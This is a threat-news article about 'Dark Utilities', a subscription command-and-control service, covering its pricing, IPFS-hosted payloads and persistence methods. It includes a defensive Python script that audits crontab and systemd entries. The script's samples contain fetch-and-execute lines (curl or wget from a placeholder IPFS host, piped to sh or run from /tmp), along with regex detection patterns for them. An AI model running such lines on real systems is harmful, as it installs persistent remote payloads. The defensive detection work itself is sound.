Researchers have spotted a new service named Dark Utilities that offers cybercriminals an easy and less expensive way to set up their own command-and-control (C2) center for malicious operations.

The Dark Utilities service

The Dark Utilities service offers attackers a platform that supports Linux, Windows, and Python-based payloads. The service removes the effort of setting up the C2 communication channel.
  • The operation is a C2-as-a-service (C2aaS) that promotes a reliable, anonymous C2 center.
  • For now, the service, along with additional functions, is being offered at a starting price of €999 ($1,021).
  • Currently, the service has 3,000 active subscribers, bringing the total revenue to about €30,000 ($30,664).

Researchers suspect that this service has been created and is managed by someone using the persona Inplex-sys.

Platform architecture

The service, which emerged in early 2022, offers C2 capabilities on both Tor and the Clear Web.
  • It hosts payloads on the Interplanetary File System (IPFS), a decentralized network system for saving and sharing data.
  • The platform supports multiple architectures. It seems that the operators are planning on expanding the list to offer a larger set of options for systems that could be targeted.
  • Further, the platform added support for ARMV71/ARM64 architectures, which are useful for targeting embedded devices such as phones, IoT devices, and routers.

Operational details

This subscription-based platform provides several feature options to its users while setting up their C2.
  • Selecting an OS generates a command string that attackers need to add to PowerShell or Bash scripts to enable the retrieval and execution of the payload on the targeted systems.
  • The selected payload can be used to establish persistence on the targeted system by creating a Registry key on Windows, or a Crontab entry or a Systemd service on Linux.
  • Additionally, the administrative panel of the platform comes with different modules for different types of attacks, such as DDoS and cryptojacking.
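
A defender-side audit for the Linux persistence and payload-retrieval behavior described above, as an added example that is not from the researchers' report or the platform itself: it parses crontab and systemd unit text and flags commands that combine download, shell execution, IPFS gateway paths, or execution from world-writable directories. The rule set, the two-hit threshold, the host `gw.example.invalid`, and the placeholder content ID are assumptions constructed for illustration.

```python
import re
# Heuristics chosen for this example (assumptions, not indicators from the report).
RULES = {
    "fetches remote content": re.compile(r"\b(curl|wget)\b"),
    "pipes into or spawns a shell": re.compile(r"\|\s*(ba|da|z)?sh\b|\b(ba)?sh\s+-c\b"),
    "IPFS gateway path": re.compile(r"/ipfs/[A-Za-z0-9]{46,}"),
    "runs from a world-writable dir": re.compile(r"(^|[\s;&|'\"])(/tmp|/var/tmp|/dev/shm)/\S+"),
}
SCHEDULE = re.compile(r"^(@\w+|(\S+\s+){4}\S+)\s+(?P<cmd>.+)$")

def crontab_commands(text):
    """Yield the command part of each job line in a user crontab."""
    for line in map(str.strip, text.splitlines()):
        if not line or line.startswith("#") or re.match(r"\w+\s*=", line):
            continue  # blank line, comment, or environment assignment
        m = SCHEDULE.match(line)
        if m:
            yield m.group("cmd")

def unit_commands(text):
    """Yield commands from the Exec* directives of a systemd unit file."""
    for line in text.splitlines():
        m = re.match(r"\s*Exec\w+\s*=\s*[-@:+!]*(?P<cmd>.+)$", line)
        if m:
            yield m.group("cmd")

def audit(source, commands):
    """Return (source, command, reasons) for commands that match two or more rules."""
    findings = []
    for cmd in commands:
        reasons = sorted(name for name, rx in RULES.items() if rx.search(cmd))
        if len(reasons) >= 2:  # one hit alone (e.g. a plain curl job) is too noisy
            findings.append((source, cmd, reasons))
    return findings

FAKE_CID = "Qm" + "A" * 44  # constructed placeholder, not a real content ID
SAMPLE_CRONTAB = f"""\
MAILTO=root
0 3 * * * /usr/bin/rsync -a /srv /backup
@reboot curl -s https://gw.example.invalid/ipfs/{FAKE_CID} -o /tmp/.u && /tmp/.u
"""  # constructed sample
SAMPLE_UNIT = f"""\
[Service]
ExecStart=/bin/bash -c 'wget -qO- https://gw.example.invalid/ipfs/{FAKE_CID} | sh'
"""  # constructed sample

def run_samples():
    return (audit("crontab", crontab_commands(SAMPLE_CRONTAB))
            + audit("systemd", unit_commands(SAMPLE_UNIT)))
```

On a real host, feed `crontab_commands` the output of `crontab -l` for each user and `unit_commands` the unit files under `/etc/systemd/system`, then review every finding against known-good jobs.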

In addition, the operators have set up support communities on Discord and Telegram to provide technical help and support to their customers.


The availability of ready-to-use C2aaS offerings at such low prices allows adversaries to carry out attacks quickly without the hassle of setting up a command center. The Dark Utilities service has already amassed thousands of subscribers due to its low prices, and it is expected to attract more adversaries. To keep up with such threats and combat them, it is essential to continuously review and enhance defense mechanisms.
Cyware Publisher